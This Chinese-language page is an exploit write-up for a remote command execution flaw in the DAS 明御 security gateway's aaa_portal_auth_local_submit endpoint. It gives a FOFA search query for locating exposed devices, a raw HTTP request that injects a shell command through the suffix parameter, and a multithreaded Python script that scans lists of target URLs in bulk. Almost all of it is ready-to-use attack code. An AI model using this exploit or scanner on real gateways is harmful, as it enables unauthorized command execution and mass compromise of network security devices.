安恒 明御安全网关 aaa_portal_auth_local_submit 远程命令执行漏洞

安恒 明御安全网关 aaa_portal_auth_local_submit 远程命令执行漏洞

FOFA：body="/webui/images/basic/login/" && title=="明御安全网关"

复现步骤

GET /webui/?g=aaa_portal_auth_local_submit&bkg_flag=0&suffix=%7Burlenc(%60id+%3E/usr/local/webui/test.txt%60)%7D HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: application/x-www-form-urlencoded

路径：http://www.example.com/test.txt

批量脚本

#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# Time       : 2023/8/15 18:28
# Author     : yunkong
# FileName   : DAS_Gateway_Rce.py
# Description: 安恒 明御安全网关 aaa_portal_auth_local_submit 远程命令执行漏洞


import argparse
import requests
import concurrent.futures
import logging

logging.basicConfig(level=logging.INFO, format='%(asctime)s - %(levelname)s - %(message)s')

proxy = {
    "http": "127.0.0.1:8080",
    "https": "127.0.0.1:8080"
}


def send_get_request(url):
    exploit_url = f"{url}/webui/?g=aaa_portal_auth_local_submit&bkg_flag=0&suffix={{urlenc(`id+>/usr/local/webui/test.txt`)}}"

    headers = {
        "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) "
                      "Chrome/35.0.1916.47 Safari/537.36",
        "Accept": "*/*",
        "Content-Type": "application/x-www-form-urlencoded",
        "Accept-Encoding": "gzip",
    }

    try:
        with requests.Session() as session:
            response = session.get(exploit_url,
                                   # proxies=proxy,
                                   headers=headers
                                   )
            if response.status_code == 200 and ""success":"local_logo"" in response.text:
                logging.info(f"[+] Successful exploit, result: {url}/test.txt")
            else:
                pass
                logging.error(f"[-] Failed exploit, result: {url}")
    except requests.exceptions.RequestException as e:
        logging.error(f"[-] HTTP request failed, result: {url}")


def main():
    parser = argparse.ArgumentParser(description="Exploit script for target URLs")
    parser.add_argument("-u", "--url", help="Single target URL")
    parser.add_argument("-U", "--url-file", help="File containing multiple target URLs")
    args = parser.parse_args()

    if args.url:
        send_get_request(args.url)
    elif args.url_file:
        with open(args.url_file, 'r') as url_file:
            url_list = [line.strip() for line in url_file]

        with concurrent.futures.ThreadPoolExecutor(max_workers=5) as executor:
            executor.map(send_get_request, url_list)
    else:
        parser.print_help()


if __name__ == '__main__':
    main()

使用方法

# 单个目标
python example.py -u http://example.com

# 多个目标
python example.py -U file_path